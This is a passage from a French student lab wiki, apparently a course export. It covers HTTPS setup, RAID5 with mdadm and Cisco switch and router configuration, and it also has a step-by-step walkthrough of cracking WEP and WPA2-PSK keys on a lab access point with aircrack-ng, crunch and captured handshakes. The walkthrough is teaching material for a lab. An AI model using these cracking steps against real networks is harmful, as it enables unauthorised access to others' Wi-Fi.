Ensuite on va regarder quels sont nos sites actifs à l'aide de apache2ctl -S , ce qui retourne :&lt;br /&gt;
    *:80                   ima2a5-rex4ever.site (/etc/apache2/sites-enabled/000-default.conf:1)&lt;br /&gt;
    *:443                  ima2a5-rex4ever.site (/etc/apache2/sites-enabled/ima2a5-rex4ever.site.conf:13)&lt;br /&gt;
Le site est prêt pour le HTTPS&lt;br /&gt;
&lt;br /&gt;
=== Securisation du DNS : Le DNSSEC ===&lt;br /&gt;
Avoir un site sécurisé c'est bien , avoir toute la chaine de transmission pour éviter les fraude c'est encore mieux. Pour cela, il est possible de concevoir un DNSSEC (contraction de DNS SECURISED)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Attaque d'une installation Wi-fi ==&lt;br /&gt;
=== Description ===&lt;br /&gt;
Notre Client Wi-fi est un ordinateur portable fourni par Monsieur Redon. Il ne nécessite pas nécessairement de configuration. Cependant, la clef Wi-Fi fournie avec elle doit être paramétrée (la datasheet peut se trouver à l'adresse suivant ; [https://www.farnell.com/datasheets/1669935.pdf Datasheet]). De plus, il faut installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA&lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il suffit de taper la commande :&lt;br /&gt;
    apt-get install aircrack-ng&lt;br /&gt;
'''Note:''' il faut auparavant configurer le réseau pour se connecter à internet.&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de '''airmon-ng''' qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
   airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
   airmong-ng start NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
   airodump-ng --encrypt wep NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis à l'aide d'un second terminal, on peut stocker les informations volées dans un .txt :&lt;br /&gt;
   Airodump-ng FICHIER.txt -c 2 --bssid ADDRESSBSSID NOMRESEAUESPIONNABLE&lt;br /&gt;
Ce qui donne dans notre cas : &lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wep wlan0mon &lt;br /&gt;
   Airodump-ng -w reseau_1.txt -c 2 --bssid 04:DA:D2:50:53 wlan0mon   (&amp;lt;== pour le réseau cracotte 3)&lt;br /&gt;
&lt;br /&gt;
Commence alors le craquage de la clef Wifi en Wep. On estime qu'il faut capturer plus ou moins 50 000 datas pour approximer 50% de chance de craquer la clef.&lt;br /&gt;
Après 40 000 datas volées , on réussit à craquer la clef, il nous aura fallu environ '''14 minutes'''.&lt;br /&gt;
&lt;br /&gt;
    KEY FOUND! [BA:BE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44 ]&lt;br /&gt;
    Decrypted correctly : 100%&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA2-PSK ===&lt;br /&gt;
De même que précedemment, on recommence en changeant le --encrypt et on obtient :&lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wpa wlan0mon &lt;br /&gt;
On obtient les informations suivantes sur notre réseau cible : &lt;br /&gt;
Channel: 2&lt;br /&gt;
SSIDName: kracotte03&lt;br /&gt;
BSSIDAdress: 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
On peut alors espionner et voler des informations avec les '''handshakes''':&lt;br /&gt;
airodump-ng -w kracotte03 -c 2 --bssid 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
'''-w kracotte03''' indique que l'on souhaite tout enregistrer dans un fichier nommé '''kracotte03.'''. On obtient alors après un moment les datas volées et les informations sont extraites sous plusieurs formats. &lt;br /&gt;
Le format '''.cap''' est compatible avec l'utilitaire que nous allons utiliser, on le copie donc sur une clef USB et on va cracker la clef sur une zabeth (vitesse de calcul plus elevée).&lt;br /&gt;
Pour se faire , on construit un dictionnaire (ensemble possible de toutes les combinaisons) avec l'utilitaire Crunch via la commande :&lt;br /&gt;
   crunch 8 8 123456789 &amp;gt;&amp;gt; Dico.txt &lt;br /&gt;
Notre dictionnaire est largement simplifié car nous sommes au courant qu'il s'agit d'un ensemble de 8 chiffres de 1 a 9 , ce qui permet de préciser à crunch une taille min et max de 8 et les caractères admissibles de 1 à 9&lt;br /&gt;
Le dictionnaire est maintenant prêt, on lance alors le cassage de clef par force brute :&lt;br /&gt;
aircrack-ng psk-01.cap -w Dico.txt&lt;br /&gt;
&lt;br /&gt;
Après TREEEEEEEEEEEEEEEEEEEEEEEEEEEEEES Longtemps , on obtient la clef :&lt;br /&gt;
      [00:21:41] 10233332/102795810 keys tested (7985.18 k/s) &lt;br /&gt;
      &lt;br /&gt;
      Time left: 3 hours, 13 minutes, 12 seconds                 9.96%&lt;br /&gt;
                           KEY FOUND! [ 10233333 ]&lt;br /&gt;
      Master Key     : 5A D9 A4 39 7A 4E 14 A6 44 DE C4 AB FF 1E 63 D7 &lt;br /&gt;
                       46 7B F8 02 23 ED EA A9 82 3F 6A FC 68 DE F2 5D &lt;br /&gt;
      Transient Key  : 29 DA 59 3B EC 25 DB 6A 62 AD 50 2C 17 52 BC F8 &lt;br /&gt;
                       C9 CD 7C 85 A5 07 7E 44 84 B5 A6 EB 2E 47 B3 D0 &lt;br /&gt;
                       1C CC CC F8 24 EB 00 0A C0 7B B8 60 13 AE 57 74 &lt;br /&gt;
                       1E 15 A9 FC D7 A8 E5 C6 14 9B 01 60 E4 C4 96 43 &lt;br /&gt;
      EAPOL HMAC     : 15 99 D7 E0 33 B3 E1 4C 57 6F 8E E4 69 AF B0 08&lt;br /&gt;
&lt;br /&gt;
== Diverses commandes ==&lt;br /&gt;
=== Creation du Raid5 avec mdadm ===&lt;br /&gt;
Nous commencons par créer un RAID5 comme demandé dans la partie 6.1 du sujet. Pour se faire on commence par créer 3 disques de 1Go chacun:&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk1 virtual&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk2 virtual&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk3 virtual&lt;br /&gt;
On éteint la machine et on recommence la même manipulation que pour la partie 3.5.1 du wiki pour attacher disk1,disk2 et disk3.&lt;br /&gt;
Nos 3 disques sont maintenant reliées à notre machine comme on le peut voir avec la commande '''fdisk -l'''&lt;br /&gt;
&lt;br /&gt;
   Disk /dev/xvdb3: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb4: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb5: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
&lt;br /&gt;
On nous propose de réaliser le raid5 logiciel avec l'utilitaire mdadm ([https://doc.ubuntu-fr.org/raid_logiciel mdadm])&lt;br /&gt;
Assemblons maintenant nos 3 disques en un RAID5 via la commande : &lt;br /&gt;
   mdadm --create /dev/md0 --level=5  --raid-devices=3 /dev/xvdb3 /dev/xvdb4 /dev/xvdb5&lt;br /&gt;
'''Note:''' Ne pas essayer de renommer md0&lt;br /&gt;
Pour automatiser le raid5 à chaque démarrage: &lt;br /&gt;
   mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
Puis le formatage du volume RAID nouvellement créé:&lt;br /&gt;
   mkfs.ext4 /dev/md0&lt;br /&gt;
Déclarez ce volume dans `fstab` pour que le système le monte au démarrage (le système de fichier, pas le volume en lui même). Pour ce faire Editez le fichier /etc/fstab et ajoutez à sa fin la ligne :&lt;br /&gt;
   /dev/md0 	/media/raid	ext4	defaults 	0	1&lt;br /&gt;
Puis créer le fichier /media/raid qui est le fichier sur lequel le raid est monté : &lt;br /&gt;
   mkdir /media/raid&lt;br /&gt;
En retirant un disque (mise en commentaire /etc/fstab), le disque md0 est toujours actif et utilisable.&lt;br /&gt;
&lt;br /&gt;
=== Cryptage de données ===&lt;br /&gt;
&lt;br /&gt;
=== Réseau WPA2-EAK ===&lt;br /&gt;
&lt;br /&gt;
== Architecture Réseau ==&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, vous trouverez comment nous avons configuré les routeurs ainsi que les commutateurs qui se trouve dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
=== Configuration des 2 commutateurs ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au commutateur, nous avons utilisé minicom avec un cable série directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le '''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Voici quelque commandes de base qui nous ont servi pour la configuration des commutateurs&lt;br /&gt;
&lt;br /&gt;
    enable           // passage en admin pour pouvoir accéder aux données du commutateur&lt;br /&gt;
    write            // Sauvegarde de la configuration et l’implanter dans le commutateur&lt;br /&gt;
    show interface status OU sh int status  // Montre l'état de toutes les interfaces présentes sur le commutateur ainsi que les données associées&lt;br /&gt;
    configuration terminal    // permets d'accéder aux interfaces et ainsi pouvoir les modifier&lt;br /&gt;
    exit             // permets de sortir du configurateur actuel (par exemple sortir de l'interface)&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports du commutateur ====&lt;br /&gt;
&lt;br /&gt;
Nous avons 4 connexions qui sont dirigées vers le commutateur de la salle E304 ainsi que celui en E306&lt;br /&gt;
 - Un lien vers le routeur&lt;br /&gt;
 - Un lien vers la borne wifi&lt;br /&gt;
 - Un lien vers Corduan&lt;br /&gt;
 - Un lien vers l'autre commutateur&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Connexion !! E304 !! E306&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Corduan&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Borne Wifi&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Commutateur&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Router&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour la borne wifi =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    //Rendre accessible la modification du port&lt;br /&gt;
    switchport trunk encapsulation dot1q   //Encapsule avec la trame le numéro du Vlan associé, ce qui permettra de d'avoir de quel équipement viens le paquet ainsi la réponse sera dirigé vers le bon port&lt;br /&gt;
    switchport mode trunk   //Configure le port du switch en mode trunk, ce qui permets de ne pas avoir de restriction sur les Vlan, tous les Vlan peuvent passer à travers ce port&lt;br /&gt;
    no shut    //Démarre le port ou de le garder actif&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour Corduan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal&lt;br /&gt;
    interface XXXX&lt;br /&gt;
    switchport&lt;br /&gt;
    switchport mode access //Rendre modifiable le port&lt;br /&gt;
    switchport access vlan42 //Autoriser le vlan 42 à transister à travers ce port&lt;br /&gt;
    no shutdown&lt;br /&gt;
    exit&lt;br /&gt;
    exit &lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour le router =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour l'autre commutateur =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création des Vlan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 42&lt;br /&gt;
    name Corduan&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 2 à 7&lt;br /&gt;
    name groupe 1 à 6&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 130&lt;br /&gt;
    name interconnexion&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
Pour supprimer un vlan il suffit de faire :&lt;br /&gt;
    no vlan X&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E304 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyACM0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexion&lt;br /&gt;
&lt;br /&gt;
  enable                                                  &lt;br /&gt;
 &lt;br /&gt;
  configure terminal&lt;br /&gt;
 &lt;br /&gt;
  interface XXXX                         &lt;br /&gt;
  no ip address                            //Pas d'addresse IP associé&lt;br /&gt;
  negotiation auto                         //Détermine automatiquement la vitesse de transfert&lt;br /&gt;
  media-type RJ45                          //Type de connexion (ici RJ45)&lt;br /&gt;
&lt;br /&gt;
Voici les vlan associé à nos groupes :&lt;br /&gt;
 &lt;br /&gt;
  service instance 2 ethernet              // création d'un vlan 2 dans cette interface&lt;br /&gt;
  encapsulation dot1q 2                    // Permets d'assurer une continuité d'un VLAN issue d'un switch sur un routeur via un lien trunk&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric      // retire le tag du vlan &lt;br /&gt;
  bridge-domain 2                          //création d'un bridge domaine interface (BDI) attribué au chiffre 2&lt;br /&gt;
    &lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
  encapsulation dot1q 3&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 3&lt;br /&gt;
    &lt;br /&gt;
  service instance 4 ethernet&lt;br /&gt;
  encapsulation dot1q 4&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 4&lt;br /&gt;
  &lt;br /&gt;
  service instance 5 ethernet&lt;br /&gt;
  encapsulation dot1q 5&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 5&lt;br /&gt;
    &lt;br /&gt;
  service instance 6 ethernet&lt;br /&gt;
  encapsulation dot1q 6&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 6&lt;br /&gt;
  &lt;br /&gt;
  service instance 7 ethernet&lt;br /&gt;
  encapsulation dot1q 7&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 7&lt;br /&gt;
&lt;br /&gt;
Voici le vlan associé à l'interconnexion :&lt;br /&gt;
 &lt;br /&gt;
  service instance 42 ethernet&lt;br /&gt;
  encapsulation dot1q 42&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 42&lt;br /&gt;
&lt;br /&gt;
======  Vers le SR 32 ======&lt;br /&gt;
  interface XXXX                        &lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 130 ethernet&lt;br /&gt;
  encapsulation dot1q 130&lt;br /&gt;
  bridge-domain 130&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
===== Configuration des BDI =====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   interface BDI2&lt;br /&gt;
   ip address 10.60.1.254 255.255.255.000           //Attribut l'addresse IPV4 pour le routeur ainsi que son mask&lt;br /&gt;
   standby version 2                                //Activation du HSRP (Host service Routing protocole) version 2 plus stable que la 1&lt;br /&gt;
   standby 3 ip 10.60.1.252                       //Donne l'addresse  IPV4 du routeur virtuelle pour le HSRP                             &lt;br /&gt;
   standby 3 preempt                              // Activation du HSRP         &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64      //Attribut l'addresse IPV6                             &lt;br /&gt;
   ipv6 enable                                      //Active l'addressage IPV6                              &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                              &lt;br /&gt;
   ipv6 nd router-preference high                    //IPV6 sera la route de préférence par défaut avec une forte probabilitée&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI3&lt;br /&gt;
   ip address 10.60.2.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252                                                     &lt;br /&gt;
   standby 3 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                       &lt;br /&gt;
   &lt;br /&gt;
   interface BDI4&lt;br /&gt;
   ip address 10.60.3.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252                                                     &lt;br /&gt;
   standby 4 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI5&lt;br /&gt;
   ip address 10.60.4.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252                                                    &lt;br /&gt;
   standby 5 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI6&lt;br /&gt;
   ip address 10.60.5.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit  &lt;br /&gt;
   &lt;br /&gt;
   interface BDI7&lt;br /&gt;
   ip address 10.60.6.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.6.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B7::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B7::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                                 &lt;br /&gt;
 &lt;br /&gt;
   interface BDI42&lt;br /&gt;
   ip address 193.48.57.173 255.255.255.240         &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 193.48.57.172                                                     &lt;br /&gt;
   standby 7 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900                               &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI130&lt;br /&gt;
   ip address 192.168.222.1 255.255.255.248                      &lt;br /&gt;
   ipv6 address FE80::42:2 link-local                                         &lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
Se le faire expliquer parce que rien compris &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.1   //Doute voir avec Redon !&lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation du réseau ====&lt;br /&gt;
&lt;br /&gt;
Question pour Redon addresse Ip à définir &lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   int XXXX&lt;br /&gt;
   ip address 10.10.10.2 255.255.255.0&lt;br /&gt;
   vrrp 1 ip 10.10.10.3                     &lt;br /&gt;
   vrrp 1 preempt                          //Activation de la préemption, si jamais le routeur tombe en panne, l'autre prend sa place&lt;br /&gt;
   vrrp 1 priority 100                     //Dans le vvrp n°1 on définit la priorité à 100, plus la priorité est élevé plus il sera sollicité&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E306 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexio&lt;br /&gt;
&lt;br /&gt;
*******************************************************************************&lt;br /&gt;
&lt;br /&gt;
*******************************************************************************&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
Se le faire expliquer parce que rien compris &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.1   //Doute voir avec Redon !&lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;/div&gt;</summary>
		<author><name>Pcoint</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51311</id>
		<title>TP sysres IMA2a5 2019/2020 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51311"/>
				<updated>2019-11-28T11:42:28Z</updated>
		
		<summary type="html">&lt;p&gt;Pcoint : /* Utilisation de AirCrack pour clef WPA-PSK */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Fichier:Rex4ever.PNG|500px|right|frameless|© Copyright Ginette]]&lt;br /&gt;
== Accueil/Descriptif du groupe ==&lt;br /&gt;
Bienvenue sur la page du groupe 3. Le découpage en groupe par numéro permet de se repérer plus facilement dans l'adressage des différents réseaux nécessaire.Ce groupe est constitué de :&lt;br /&gt;
&lt;br /&gt;
*Pascal Coint&lt;br /&gt;
*Quentin Weisbecker&lt;br /&gt;
&lt;br /&gt;
Ce TP consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système nous avons à installer une machine virtuelle Xen avec l'OS Devian ainsi qu'implanter un auto-commutateur et un point d'accès. Nous effectuerons pas la suite des tests d'intrusion sur ces points d'accès afin de voir la vulnérabilité des différents protocoles de clé. Pour notre cas, nous nous étendrons sur les protocoles [https://fr.wikipedia.org/wiki/Wired_Equivalent_Privacy WEP] et [https://fr.wikipedia.org/wiki/Wi-Fi_Protected_Access WPA]-PSK.&lt;br /&gt;
